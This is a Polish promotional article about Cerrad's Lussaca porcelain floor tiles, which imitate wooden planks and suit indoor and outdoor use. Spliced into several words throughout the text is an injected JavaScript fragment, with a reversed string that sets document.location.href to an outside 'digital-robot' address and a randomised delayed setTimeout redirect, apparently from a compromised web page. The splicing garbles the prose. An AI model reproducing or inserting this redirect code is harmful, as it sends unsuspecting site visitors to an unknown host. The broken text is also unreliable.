Gresowe płytki Lussaca

Wśród produktów wytwarzanych przez firmę Cerrad, znajdziemy różnorodne płytki podłogowe, które realizowane są z różnych materiałów. W ostatnim czasie, ze względu na funkcjonalność i estetykę wykonania, bardzo dużą popularnością wśród klientów cieszą się płytki gresowe. Wśród nich znajdziemy płytki nazwane Lussaca, które dobrze dopasują się do różnych wnętrz.

Estetyka płytek podłogowych Lussaca

płytki lussacaKażde płytki podłogowe charakteryzują się określoną stylistyką, w której zostały wykonane. Płytki Lussaca zostały zaprojektobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}towane w taki sposób, by swoim wyglądem przypominać możliwie w jak największym stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}topniu drewniane deski. Dzięki temu, jeśli marzymy o drewnianej podłodze, ale z pewnych względów nie możemy sobie na nią pozwolić, możemy w naszym domu wykorzystać płytki Lussaca. Ich struktura sprawia, że są zdecydowanie łatwiejsze w pielęgnacji niż drewniane panele, a w zakresie wyglądu właściwie niczym nie odbiegają od swoich pierwowzorów. Płytki Lussaca dostępne są w różnych odcieniach, dzięki czemu możemy zdecydować się na płytki w nieco cieplejszym lub chłodniejszym tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tonie. Płytki wykonane zostały w taki sposób, by ich powierzchnia była w pełni antypoślizgowa. Dzięki temu również ich odporność na ścieranie ulega zwiększeniu, co sprawia, że przez znacząco dłuższy czas zachowują odpowiednią estetykę i mogą cieszyć nasze oczy swoim eleganckim i niezwykle naturalnym wyglądem.

Płytki podłogowe Lussaca są nie tylko odporne na ścieranie, ale również na oddziaływanie mrozu i opadów deszczu. Z tego też względu mogą być one zastobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tosowane nie tylko na podłogach naszego mieszkania, ale również poza nim, np. na balkonie lub na tarasie, który bezpośrednio sąsiaduje z naszą przestrzenią mieszkalną. W przypadku pomieszczeń są one stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tosowane właściwie wszędzie.